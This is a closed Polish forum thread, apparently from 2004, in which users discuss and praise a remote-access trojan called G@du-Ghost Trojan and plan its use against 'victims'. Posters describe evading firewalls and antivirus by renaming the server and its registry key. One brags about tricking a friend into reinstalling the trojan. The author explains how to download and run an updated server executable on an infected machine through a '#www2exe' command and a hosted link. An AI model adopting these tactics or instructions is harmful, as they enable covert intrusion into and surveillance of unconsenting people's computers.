G@du-Ghost Trojan

Status
Zamknięty.

Djuk

Użytkownik
Dołączył
Luty 23, 2004
Posty
10
Ja tam normalnie link downloadu wkleilem do FlashGet'a i samo sie zrobilo
<
Wojass swietna robota
smile.gif
Propozycja: screen wyslany jako plik przez GG
<
 

Chochlik

Użytkownik
Dołączył
Styczeń 10, 2003
Posty
391
Najlepiej by bylo gdyby trojek stawial u ofiary serwer FTP
<
To by ograniczylo w duzym stopniu problemy z przesylaniu plikow...
 

e-5pIdEr

Użytkownik
Dołączył
Kwiecień 14, 2003
Posty
11
Originally posted by ErrOr+--><div class='quotetop'>CYTAT(ErrOr)</div>
<!--QuoteBegin-e-5pIdEr
A ja niestety nie moge zassac tego trojana.
Nie wykrywa mi tego pliq na stronce
<

Skad moge zassac tego trojanka ?

Witam,

Robiąc strone dla GGT, Wojass zaproponował licznik kliknięć w tym właśnie jest błąd, wyłącz wszystkie programy wspomagająće tj, Flashget DAP itp... i pobierz to normalnie klikająć.

Pozdrawiam, ErrOr.[/b]

Dzieki :-D
Juz zassalem pliczek i skonfigurowalem. Zarka bede robil testy
smile.gif

Szkoda tylko , ze trojan dziala na zasadzie komend ale i tak uwazam to za najlepszy trojan z jakim mialem doczynienia
<

Miejmy nadzieje , ze bez zadnych bledow uda mi sie polaczyc z ofiara 8)

Pozdro :-D
 

Quentin

Użytkownik
Dołączył
Listopad 12, 2003
Posty
49
Originally posted by SlashBeast
Wojass powinienieś dodoać opcje do Edit Servera z pytaniej Jaki ma być Klucz w rejestrze bo GGSSL to odrazu wiadomo co to, i opcje gdzie skopiować plik serwera go c:WindowsSystemggssl.exe to też łatwe do namieżenia.

c:WindowsSystem32ggssl.exe przynajmniej na XP

pponiewaz ostatnio napisałem kilka bzdur (ale pisałem że na gorąco) to teraz tylko sprawdzone:
1 Uwazjacie na konfiguracje serwera - jezeli ktos dorwie Edit_server to odczyta konfiguracje wlasnie z c:WindowsSystemggssl.exe jak podace wasz znany adres email lub konto GG to znajmi sie wk...ia!!

2. Oczywiscie aktywny firewall wychwytuje probe placzenia z internetem (przynajmniej NIS) więc zmieniać nazwę - server to juz chyba w 70% przypadkow nie przejddzie

3 Zainstalłowalem u siebie ale moj IP podaje blednie (ani to z wew. sieci ani z zew.) - maly problem

4. Koles z aktywnym serverkiem formatowal dysk - sam mu uzyczylem plytke z ?? wracam do doomu a serverek ONLINE :shock: koles do mnie pisze zebym mu jeszcze raz podeslal...bo jest po formacie (wkrecilem go ze serverek zmniejsza awarynosc GG poprzez aktywna zmiane serverow w przypadku awarii jednego z nich)
<
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
od dzisaj siedze nad nową wersja GGT i pisze ja zupelnie od nowa i troche inaczej, mam nadzieje ze bedzie bardziej stablina i o wiele bogatsza w funkcje, mysle ze do tygodnia sie wyrobie, 8)
 

qczka

Użytkownik
Dołączył
Wrzesień 24, 2003
Posty
134
nalezą sie wielke brawa dla twórcy trojana, bardzo nowatorska praca
<
 

mlodys

Użytkownik
Dołączył
Listopad 23, 2003
Posty
75
a wiec ja czekam na nowa produkcje by ja wyprobowac. Bom niestety nie na tym poziomie jest jeszcze by takie rzeczy tworzyc wlasnymi spracowanymi rekoma i wysilac lepek w ta stronke zamiast powtarzac teraz do maturki.
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
GGT wersja 1.1 już jest ! i bedzie dzisaj dostepna na www.ggt.int.pl, czekam tylko na ErrOra zeby zrobil upload na serwer,
na pierwszy rzut oka nie wiele sie zmieniło, a tak naprawde v1.1 ma inny nowy kod i jest napewno lepsza niz 1.0 beta, 8)
 

Quentin

Użytkownik
Dołączył
Listopad 12, 2003
Posty
49
to cieszy...
<

czy będzie mozna polozyc nową wersje na starą przez polecenie #@plik??

no i sie spuznilem a chyba dwie ważne funkcje by się przydały:
1. zdalna zmiana ustawień...przygotowałem najważniejszą dla mnie wersje i cos spapralem w e-mailu
<
i teraz jest ZONK
2. mimo wszystko hasełko na ustawienia serwerka...zwracalem uwage że kumaty zawsze moze dorwac edit_serv... i leżymy i świszczymy...

wielkie dzieki za wlozona prace.
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
Originally posted by Quentin
to cieszy...
<

czy będzie mozna polozyc nową wersje na starą przez polecenie #@plik??

no i sie spuznilem a chyba dwie ważne funkcje by się przydały:
1. zdalna zmiana ustawień...przygotowałem najważniejszą dla mnie wersje i cos spapralem w e-mailu
<
i teraz jest ZONK
2. mimo wszystko hasełko na ustawienia serwerka...zwracalem uwage że kumaty zawsze moze dorwac edit_serv... i leżymy i świszczymy...

wielkie dzieki za wlozona prace.

polecenie @plik sluzy tylko do wysylana sobie plikow na @, jak chcesz podmienic to kombinuj z www2exe
co do 2 to chcialem zrobic gwiazdki ale po co jak kumaty i z gwiazdek wyciagnie , jedyne musial bym jakis szyfr załozyć na ustawienia pomysle nad tym moze... mi tak opcja nie potrzebna bo zawwsze moge swoje ustawiena wpakowac w kod serwera 8)
 

Quentin

Użytkownik
Dołączył
Listopad 12, 2003
Posty
49
Wojass - pomocy !!!

Originally posted by Wojass
...jak chcesz podmienic to kombinuj z www2exe...

co rozumiesz przez to pokombinuj, bo ja kombinuje juz kilka godzin i niestety nic...tzn raczej www2exe nic mi nie sciaga a o efekcie w postaci odpalenia poprawnie skonfigurowanego serwerka juz nie wspomne...

nie popelniam bledu w adresie...
pobieram server.exe z nowymi ustawieniami i nic...
probowalem na kilku systemach XP i 98 i na zadnym nawet znaku zycia nowego serverka...

zalezy mi szczegolnie na jednym na 98...wysyla przez smtp.wp.pl wiec w nazwie wpisalem tylko nazwe uzytkownika bez @ i tej reszty i okazalo sie ze ZONK
to jest najwazniejszt serwerek nazyciu...
samo przegladanie mnie zabije :evil:
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
zrob odnowa serwer.v1.1, z dobrymi ustawieniami @, daj sever.exe gdzies na www, no i jak ofiara ma ggt1.0 to piszesz #www2exe [enter]
i podajesz dzałajacy link np. http://republika.pl/costam/cos/server.exe [enter] i czekasz,
smile.gif
proste , warunkiem jest to ze ofiara musi miec Internet Explorer`a, w wersji 1.1 polecenia wpisujesz juz bez #
testy GGT robilem na XP, raszta Windoz moze wariować
<
ale ponoc dzała
 

Quentin

Użytkownik
Dołączył
Listopad 12, 2003
Posty
49
zaprawde powiadam Ci...wszystko robiłem w ten sposób z tym, że z poprawnie skonfigurowanym 1.0...
zobaczymy czy wyjdzie z 1.1...
moze do jutra wytrzymam...

pozdrawiam
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
Originally posted by Quentin
zlikfiduj przecinek na koncu adresu...przylukaj dobrze to sie zorientujesz dlaczego sie nie otwiera...jak poprawisz bedzie oki z tym ze 1.1 na niej jeszcze nie ma...
jest juz od wczoraj :shock:
a od dzisaj kaspersky wykrywa GGT pod dziwną nazwą Backdoor.Plimus.11
 

Quentin

Użytkownik
Dołączył
Listopad 12, 2003
Posty
49
GGT v 1.x
- G@du-Ghost Trojan v.1.0 [37]

GGT v Bety(wersje testowe)
- brak

mam tylko to w dziale download...odswiezalem strone...??
 

fergus

Użytkownik
Dołączył
Listopad 19, 2003
Posty
27
Originally posted by Wojass
a od dzisaj kaspersky wykrywa GGT pod dziwną nazwą Backdoor.Plimus.11
, no prosze , czyli juz po zabawie, to znaczy moze nie do konca, bo przeciez nie wszyscy maja Kaperskiego, ale skoro juz taki antywitr wyrkywa GGT to kwestia tego ze reszta bardziej liczacych sie tez bedzie to tylko kwestia dni ... wiec jednak nie oplaca sie pisac trojanow dla publiki i udostepniac ich ... chyba ze dla siebie wersja inna i inna dla rzeszy tlumow ... eh ... krotkie zycie takiego fajnego trojana ... :cry:
 

Marek

Użytkownik
Dołączył
Styczeń 1, 2004
Posty
215
Odp

Wiedziałem że tak będzie, ale nie sądziłem że tak szybko.
 
Status
Zamknięty.
Do góry Bottom